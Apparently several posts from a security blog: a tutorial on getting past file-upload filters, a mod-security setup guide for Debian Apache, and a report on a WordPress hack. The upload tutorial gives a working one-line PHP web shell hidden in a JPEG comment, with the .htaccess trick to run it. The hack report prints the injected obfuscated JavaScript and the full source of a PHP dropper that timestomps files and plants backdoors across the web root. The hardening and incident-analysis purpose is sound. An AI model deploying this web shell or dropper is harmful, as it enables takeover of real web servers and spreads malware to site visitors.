A first method is content-type checking, which can be easily bypassed with a intercepting proxy (tampering the MIME type). The screenshot below shows an intercepted request where the attacker modifies the content-type (beforehand text/php) and then forwards the content to the server:

HTTP POST content-type tampering

Thus, the content-type filtering is bypassed.

Another method consists in checking the file name extension. If simple bypasses like playing with lowercase (.PHP instead of .php), using multiple extension (.php.foo) or triggering the NULL byte (.php%00.jpg) do not work, there is a last chance by uploading a crafted image.

JPEG files are convenient for code injection: they support EXIF metadata, which include a comment field where anything can be written, as long as it is on a single line.

So, when a web server parses the image content, it may interpret the PHP code inside if it is improperly secured.

The method is however totally dependent on the ability to upload a .htaccess file, which may be a long way to go.

Though, one advantage of using an image in most upload vulnerability exploitation cases is stealth: an image will always look less suspicious than a dropped .php file.

Anyway, for fun, here is how to do:

1. Upload a .htaccess file that contains:

   AddType application/x-httpd-php .jpg

2. Take a JPEG file of your choice, install the jhead tool (there are many alternatives, like exiftool, but this one is straightforward).
3. House-keeping (delete extra headers):

   jhead -purejpg <filename>.jpg

4. Edit EXIF JPEG comment:

   jhead -ce <filename>.jpg

5. Copy / paste your PHP code, like this one for instance (must fit in one line):

   <style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="./clean_imagejs';}__halt_compiler();?></h1>

   This code just reads a command from the cmd parameter when it is set. If it is absent, then for more discretion it displays another image (clean_image.jpg, that you would have uploaded previously, for instance). The CSS style trick (font size of 0) just hides some garbage that comes from the JPEG header.

6. Just upload the file and test it! DVWA is a convenient and safe way for that.

Note this nice article as a reference on the topic, and the solution that is suggested to fix such a vulnerability: disabling one way or another script execution on the upload directory and use random server-side file renaming.

It is especially usefull if your website is dynamic, involving php, sql, javascript, etc. With such a complex environment, as you can never be sure that your website is not vulnerable or up-to-date enough, something like mod-security provides an interesting extra-security layer.

Due to license issues, mod-security is no more shipped with Debian – it was until Debian Sarge.

Fortunately, the Debian maintainer continue to provide some packages on his website.

So, the easy way to set up mod-security on your Debian system is to add this line in your /etc/apt/source.list file :

$ echo "deb http://etc.inittab.org/~agi/debian/libapache-mod-security2/ etch/" >> /etc/apt/source.list

Then type in the usual sequence :

$ aptitude update && aptitude install libapache-mod-security2

You could also download the source from the official website.

Once it is done, comes the configuration part. The configuration is critical because any mistake on it will make it at best useless, or at worst blocking your website.
You have the choice between creating your rules from scratch or getting some ready made.
Creating your rules will require a lot of time and expertise in the http protocol, php, sql, and any other service that you offer with Apache.
That was not really my case, so I started to look for some ready made rules on google. I could not get good ones. Most of tutorial gives only some very basic and incomplete rules : useless. I found a good paper, notably containing some specific rules for WordPress, but the rules were written for mod-security v1 whereas it is now in its second version.
Oh, did I forget to tell you ? Most of the syntax was changed between the two versions !!! Not very nice, even if it was worth doing it.

Finally, I came to find a way with the rules provided by this website, Got Root ?. They provide quite up-to-date rules, with a delay of 30 days subscription-free, which is quite acceptable for what I want to do. After all, Php exploits and Sql injection technics don’t change every day.

The rules are also complete and spread over several files, one for each category in : generic rules, blacklist, usergents, proxies, rootkits…

We can fetch them with a little script. They suggest to add it as a cron job, but you should not, except if you don’t mind that your website becomes unavailable ! These rules always require testing, some of them may be broken or require customizing… be careful and always check what’s inside the rule files !

Here is the small script, modsec.sh, that I made to retrieve the rules and put them in the right directory :

#!/bin/sh

wget http://www.gotroot.com/downloads/ftp/mod_security/2.0/apache2/apache2-gotrootrules-modsec2.0-latest.tar.gz
if [ -e apache2-gotrootrules-modsec2.0-latest.tar.gz ]
then
tar -xzvf apache2-gotrootrules-modsec2.0-latest.tar.gz -C /etc/apache2/modsecurity/
fi
rm apache2-gotrootrules-modsec2.0-latest.tar.gz
/etc/init.d/apache2 restart

Make it executable and run it :

# chmod +x modsec.sh
$ ./modsec.sh

Now, let’s edit the /etc/apache2/apache2.conf file.

Just before these lines (probably at the bottom of the file) :

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/

Add these :

#Turn the filtering engine On or Off
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off

# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072
# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072
# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288

SecDebugLog /var/log/apache2/modsec_debug.log
SecDebugLogLevel 0
# Serial audit log
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus ^5
SecAuditLogParts ABIFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log

#should mod_security inspect POST payloads
#SecRuleScanPOST On

# by default log and deny suspicious requests with HTTP status 500
SecDefaultAction log,auditlog,deny,status:403,phase:2,t:none

#First, add in your exclusion rules:
#These MUST come first!
Include /etc/apache2/modsecurity/exclude.conf

#Application protection rules
Include /etc/apache2/modsecurity/rules.conf

#Comment spam rules
Include /etc/apache2/modsecurity/blacklist.conf

#Bad hosts, bad proxies and other bad players
Include /etc/apache2/modsecurity/blacklist2.conf

#Bad clients, known bogus useragents and other signs of malware
Include /etc/apache2/modsecurity/useragents.conf

#Known bad software, rootkits and other malware
Include /etc/apache2/modsecurity/rootkits.conf

#Signatures to prevent proxying through your server
#only rule these rules if your server is NOT a proxy
#Include /etc/apache2/modsecurity/proxy.conf

#Additional rules for Apache 2.x ONLY!  Do not add this line if you use Apache 1.x
Include /etc/apache2/modsecurity/apache2-rules.conf

As you can see, we just include the rule files we just downloaded. You can easily activate or deactivate some to fit your needs.

You will probably notice that there is a performance impact after activating mod-security – not so big to me, but it also depends on your traffic. It is up to you to optimize the number of activated rules to make it faster.

If some page appear to be blocked, check the /var/log/apache2/error.log for something like :

[Fri Jul 11 19:33:08 2008] [error] [client 192.168.222.21] ModSecurity: Access
denied with code 500 (phase 2). Match of "rx ^HTTP/(0\\\\.9|1\\\\.0|1\\\\.1|1\\
\\.2)$" against "REQUEST_PROTOCOL" required. [id "340000"] [msg "Bad HTTP Proto
col"] [severity "ALERT"] [hostname "www.phocean.net"] [uri "/"] [unique_id "72F
col"] [severity "ALERT"] [hostname "www.phocean.net"] [uri "/"] [unique_id "72F
mG38AAAEAACa@AVUAAAAA"]

The ID number of the blocking rule is given. Just grep to find the faulty rule and correct / deactivate it :

$ grep 340000 /etc/apache2/modsecurity

Regxp knowledge required ! :D

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

It make me think that there is a serious vulnerability somewhere on WordPress or a plugin, though my versions were up-to-date.

Now the blog is back to normal, after a clean reinstallation (erased all the former files).

I am not the only one to experience this mess.

For now, the blog is running with a minimal number of plugin – just akismet, actually – until the cause of that gets clearer.

Not a lot of plugins runned before, so it mainly means that the OpenID support for authentication is cut off.

As my php knowledge is very low, anyone having some tips is welcome. I love WordPress, I would like to avoid looking for another platform or switch to static html !

—

UPDATE 06/13/2008 :
As C.S Lee suggested in a comment, there were a very suspicious wp-stats.php file in the root of my hacked archive.

There is the code :

<?php

@error_reporting(E_ALL);
@set_time_limit(0);
mt_srand(crc32(microtime()));
  
  
define('SHCODE', 'PDaWYgKCRjb2RlID0gQGZyZWFkKEBmb3BlbigkSFRUCmVjaG8gIjwvcHJlPiI7Cj8+');

$pres = array('lib_','co_','pre_','net_','func_','ad_','ext_','new_','old_','fix_','fixed_','na_','av_','fx_');  
$fui = $pres[array_rand($pres)];

global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8, 7, 6, 6, 5, 5, 5, 5, 0);

function my_fwrite($f, $data) {
  global $CURFILE;
  $file_mtime = @filemtime($f);
  $file_atime = @fileatime($f);
  $dir_mtime = @filemtime(@dirname($f));
  $dir_atime = @fileatime(@dirname($f));
  if ($file_h = @fopen($f, "wb")) {
    @fwrite($file_h, $data); @fclose($file_h);
    if ($file_mtime) {
      @touch($f, $file_mtime, $file_atime);
    } elseif (@filemtime($CURFILE)) {
      @chmod($f, @fileperms($CURFILE));
      @touch($f, @filemtime($CURFILE), @fileatime($CURFILE));
      @chgrp($f, @filegroup($CURFILE));
      @chown($f, @fileowner($CURFILE));
    };
    if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
    return $f;
  } else {
    return '';
  };
};

function ext($f) {
  return substr($f, strrpos($f, ".") + 1);
};

function walkdir($p, $func='_walkdir', $l=0) {
  global $START;
  global $WD_TIMEOUT;
  global $FL;
  $func_f = "{$func}_f";
  $func_d = "{$func}_d";
  $func_s = "{$func}_s";
  $func_e = "{$func}_e";
  if ($dh = @opendir("$p")) {
    if (function_exists($func_s)) {
      if ($func_s($p, $l)) return 1;
    };
    while ($f = @readdir($dh)) {
      if (time() - $START >= $WD_TIMEOUT[$l] ) break;
      if ($f == '.' || $f == '..' ) continue;
      if (@is_dir ("$p$f/") ) walkdir("$p$f/", $func, $l+1);
      if (@is_dir ("$p$f/") && function_exists($func_d))
        $func_d("$p$f/", $l);
      if (@is_file("$p$f" ) && function_exists($func_f))
        $func_f("$p$f" , $l);
    };
    closedir($dh);
    if (function_exists($func_e)) $func_e($p, $l);
  };
};

function r_cut($p) {
  global $R;
  return substr($p, strlen($R));
};

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'] .
  $HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
//$FN = "namogofer.$fe";

function _walkdir_s($d, $l) {
  global $FCNT;
  $FCNT = array( 'fn' => '', 'dir' => 0, 'file' => 0, 'simtype' => 0 );
};

function _walkdir_d($d,$l) {
  global $FCNT;
  $FCNT['dir' ]++;
};

function _walkdir_f($f,$l) {
  global $FCNT, $CURFILE;
  $FCNT['file']++;
  if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
};

function update_passwd($data)
  {
  global $FCNT;
  $password = "";
  $possible = "abcdefghijklmnopqrstuvxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*"; 
  $i = 0;
  while ($i < 15) 
    { 
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    if (!strstr($password, $char)) 
      { 
      $password .= $char;
      $i++;
      }
    }
  $FCNT['passwd'] = $password;
  $md5password = md5($password);
  return preg_replace("|define\('PASSWD',\s*'(.*)'|", "define('PASSWD','$md5password'", $data);
  }

function notinf($ar, $tx)
  {
  $R = true;
  foreach ($ar as $ca)
    {
    //echo "pass ".substr($tx, 0, strlen($ca))." in $tx for $ca\n";
    if ("$ca" == substr($tx, 0, strlen($ca)))
      {
      $R = false;
      //echo "gotcha\n";
      break;
      }
    }
  return $R;
  }

function _walkdir_e($d,$l) 
  {
  global $C, $FCNT, $FN, $fui, $pres;
  
    $the_data = base64_decode(SHCODE);
    $the_dir = opendir("$d");
    $is_php=false;
    if ($the_dir)
        while($cfile = readdir($the_dir))
            {
            if(
                $is_php=
                
                (('.php' == substr($cfile, -4))and
                 notinf($pres, $cfile)and
                ($cfile!='index.php'))
                 
              )
              {
              $FN = "$fui$cfile";
              break;
              }
              else
              {
              //echo "pass $cfile\n";
              }
            }
                         
        if ( $is_php and my_fwrite("$d$FN", str_repeat("\n",100) . str_repeat('', 150) .
                    update_passwd($the_data . str_repeat(' ', 150) . "\n" . str_repeat("\n", 100))))
                    {
                    $FCNT['fn'] = r_cut("$d$FN");
                    say(implode(" ", $FCNT));
                    }

  };

walkdir("$R/");
testdata('end');
?>

I will try anyway to put a deeper look when I have a little time : now, I have to go to work.